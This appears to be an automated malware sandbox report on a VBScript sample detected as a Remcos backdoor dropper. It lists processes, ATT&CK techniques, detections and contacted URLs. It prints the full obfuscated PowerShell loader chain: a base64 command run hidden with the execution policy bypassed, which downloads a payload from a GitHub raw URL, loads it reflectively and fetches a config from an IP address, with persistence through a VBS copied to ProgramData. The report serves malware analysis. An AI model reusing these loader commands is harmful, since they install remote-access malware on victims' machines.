Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.drBinary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: autopatia.vbs.4.drBinary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.drBinary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn/M
Source: wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: powershell.exe, 00000003.00000002.2203709649.0000022A9B7D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnujfsjysndxjsid0gjysnuuxljysnahr0cccrj3m6ly8nkydyyscrj3cnkycuz2l0accrj3unkydidxnlcmnvbnrlbnqnkycuy28nkydtl05vrgv0zwn0t24vtm9ezxqnkydljysnyycrj3rpbi9yjysnzwzzl2hlywrzlycrj20nkydhaw4vrgv0ywhob3rolscrj1yudhgnkyd0uuxloybsmwxiyxnlnjrdbycrj24nkyd0zw50id0gke5ldy1pymonkydly3qgu3lzdgunkydtlk5ljysndccrjy4nkydxzscrj2jdjysnbgknkydlbnqplkrvdycrj25sb2fkjysnu3ryaw4nkydnjysnkfinkycxbhvyjysnbck7jysnifixbgjpbicrj2fyescrj0mnkydvbnrlbnqnkycgjysnpsbbu3lzdccrj2vtlicrj0nvbnzlcnrdojpgcicrj29tqicrj2fzzty0u3ryjysnaw4nkydnkfixbgjhc2u2nccrj0nvbnqnkydlbicrj3qpjysnoybsjysnmwwnkydhc3mnkydlbwinkydsesa9iftszwynkydsjysnzwn0aw9ulkenkydzjysnc2unkydtymx5xto6tccrj29hzcgnkydsmwxiaw5hjysncnldb250jysnzw50ktsgjysnwycrj2rubglijysnlklpjysnlkgnkydvbwvdjysnojonkydwqukozhprdhh0licrj0dgq1jslzankyc1nc8zjysnns4znc4nkyc1ljinkyc3ly86chr0accrj2r6aycrjywgzhprjysnmwr6aycrjywgjysnzhprjysnqzprjysnc2gnkydqcm9ncicrj2ftrgf0ywtzagr6aywgzhpryxv0b3ankydhdglhzccrj3prlccrjybkemsnkydszwcnkydbc21keicrj2ssigqnkyd6a2qnkyd6aycrjyxkjysnemtkjysnemspjyktukvqtefdzsagkftjaefyxtewmctby2hbcl0xmjirw2noqxjdmta3ksxby2hbcl0zncatukvqtefdzsana3nojyxby2hbcl05mi1dukvwbefdzsagkftjaefyxtgyk1tjaefyxtq5k1tjaefyxtewocksw2noqxjdmzyglvjfuexbq2unuuxljyxby2hbcl0zosl8icyoichbc3rysu5nxsr2zxjct1nluhjlzkvsrw5jzslbmswzxssnecctak9jbicnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('r1l'+'url = '+'qle'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/nodetecton/nodet'+'e'+'c'+'ton/r'+'efs/heads/'+'m'+'ain/detahnoth-'+'v.tx'+'tqle; r1lbase64co'+'n'+'tent = (new-obj'+'ect syste'+'m.ne'+'t'+'.'+'we'+'bc'+'li'+'ent).dow'+'nload'+'strin'+'g'+'(r'+'1lur'+'l);'+' r1lbin'+'ary'+'c'+'ontent'+' '+'= [syst'+'em.'+'convert]::fr'+'omb'+'ase64str'+'in'+'g(r1lbase64'+'cont'+'en'+'t)'+'; r'+'1l'+'ass'+'emb'+'ly = [ref'+'l'+'ection.a'+'s'+'se'+'mbly]::l'+'oad('+'r1lbina'+'rycont'+'ent); '+'['+'dnlib'+'.io'+'.h'+'ome]'+'::'+'vai(dzktxt.'+'gfcrr/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'c:k'+'sh'+'progr'+'amdatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'reg'+'asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-replace ([char]100+[char]122+[char]107),[char]34 -replace 'ksh',[char]92-creplace ([char]82+[char]49+[char]108),[char]36 -replace'qle',[char]39)| &( ([string]$verbosepreference)[1,3]+'x'-join'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnujfsjysndxjsid0gjysnuuxljysnahr0cccrj3m6ly8nkydyyscrj3cnkycuz2l0accrj3unkydidxnlcmnvbnrlbnqnkycuy28nkydtl05vrgv0zwn0t24vtm9ezxqnkydljysnyycrj3rpbi9yjysnzwzzl2hlywrzlycrj20nkydhaw4vrgv0ywhob3rolscrj1yudhgnkyd0uuxloybsmwxiyxnlnjrdbycrj24nkyd0zw50id0gke5ldy1pymonkydly3qgu3lzdgunkydtlk5ljysndccrjy4nkydxzscrj2jdjysnbgknkydlbnqplkrvdycrj25sb2fkjysnu3ryaw4nkydnjysnkfinkycxbhvyjysnbck7jysnifixbgjpbicrj2fyescrj0mnkydvbnrlbnqnkycgjysnpsbbu3lzdccrj2vtlicrj0nvbnzlcnrdojpgcicrj29tqicrj2fzzty0u3ryjysnaw4nkydnkfixbgjhc2u2nccrj0nvbnqnkydlbicrj3qpjysnoybsjysnmwwnkydhc3mnkydlbwinkydsesa9iftszwynkydsjysnzwn0aw9ulkenkydzjysnc2unkydtymx5xto6tccrj29hzcgnkydsmwxiaw5hjysncnldb250jysnzw50ktsgjysnwycrj2rubglijysnlklpjysnlkgnkydvbwvdjysnojonkydwqukozhprdhh0licrj0dgq1jslzankyc1nc8zjysnns4znc4nkyc1ljinkyc3ly86chr0accrj2r6aycrjywgzhprjysnmwr6aycrjywgjysnzhprjysnqzprjysnc2gnkydqcm9ncicrj2ftrgf0ywtzagr6aywgzhpryxv0b3ankydhdglhzccrj3prlccrjybkemsnkydszwcnkydbc21keicrj2ssigqnkyd6a2qnkyd6aycrjyxkjysnemtkjysnemspjyktukvqtefdzsagkftjaefyxtewmctby2hbcl0xmjirw2noqxjdmta3ksxby2hbcl0zncatukvqtefdzsana3nojyxby2hbcl05mi1dukvwbefdzsagkftjaefyxtgyk1tjaefyxtq5k1tjaefyxtewocksw2noqxjdmzyglvjfuexbq2unuuxljyxby2hbcl0zosl8icyoichbc3rysu5nxsr2zxjct1nluhjlzkvsrw5jzslbmswzxssnecctak9jbicnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('r1l'+'url = '+'qle'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/nodetecton/nodet'+'e'+'c'+'ton/r'+'efs/heads/'+'m'+'ain/detahnoth-'+'v.tx'+'tqle; r1lbase64co'+'n'+'tent = (new-obj'+'ect syste'+'m.ne'+'t'+'.'+'we'+'bc'+'li'+'ent).dow'+'nload'+'strin'+'g'+'(r'+'1lur'+'l);'+' r1lbin'+'ary'+'c'+'ontent'+' '+'= [syst'+'em.'+'convert]::fr'+'omb'+'ase64str'+'in'+'g(r1lbase64'+'cont'+'en'+'t)'+'; r'+'1l'+'ass'+'emb'+'ly = [ref'+'l'+'ection.a'+'s'+'se'+'mbly]::l'+'oad('+'r1lbina'+'rycont'+'ent); '+'['+'dnlib'+'.io'+'.h'+'ome]'+'::'+'vai(dzktxt.'+'gfcrr/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'c:k'+'sh'+'progr'+'amdatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'reg'+'asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-replace ([char]100+[char]122+[char]107),[char]34 -replace 'ksh',[char]92-creplace ([char]82+[char]49+[char]108),[char]36 -replace'qle',[char]39)| &( ([string]$verbosepreference)[1,3]+'x'-join'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information331
Scripting		Valid Accounts11
Command and Scripting Interpreter		331
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		11
Registry Run Keys / Startup Folder		11
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523826 Sample: WW8kzvnphl.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 34 raw.githubusercontent.com 2->34 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 7 other signatures 2->52 10 wscript.exe 1 2->10         started        13 wscript.exe 2->13         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 56 VBScript performs obfuscated calls to suspicious functions 10->56 58 Suspicious powershell command line found 10->58 60 Wscript starts Powershell (via cmd or directly) 10->60 62 3 other signatures 10->62 17 powershell.exe 7 10->17         started        process6 signatures7 40 Suspicious powershell command line found 17->40 42 Obfuscated command line found 17->42 44 Found suspicious powershell code related to unpacking or dynamic code loading 17->44 20 powershell.exe 15 17 17->20         started        24 conhost.exe 17->24         started        process8 dnsIp9 36 72.5.43.53, 49731, 49738, 80 UNASSIGNED United States 20->36 38 raw.githubusercontent.com 185.199.111.133, 443, 49730 FASTLYUS Netherlands 20->38 54 Creates autostart registry keys with suspicious values (likely registry only malware) 20->54 26 cmd.exe 2 20->26         started        signatures10 process11 file12 32 C:\ProgramData\autopatia.vbs, ASCII 26->32 dropped 64 Command shell drops VBS files 26->64 30 conhost.exe 26->30         started        signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WW8kzvnphl.vbs13%ReversingLabsScript-WScript.Backdoor.Remcos
WW8kzvnphl.vbs7%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://raw.githubusercontent.com0%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
http://raw.githubusercontent.com0%VirustotalBrowse
http://72.5.43.53/450/RRCFG.txt0%VirustotalBrowse
http://72.5.43.530%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;0%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
raw.githubusercontent.com
185.199.111.133
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
http://72.5.43.53/450/RRCFG.txtfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://72.5.43.53powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
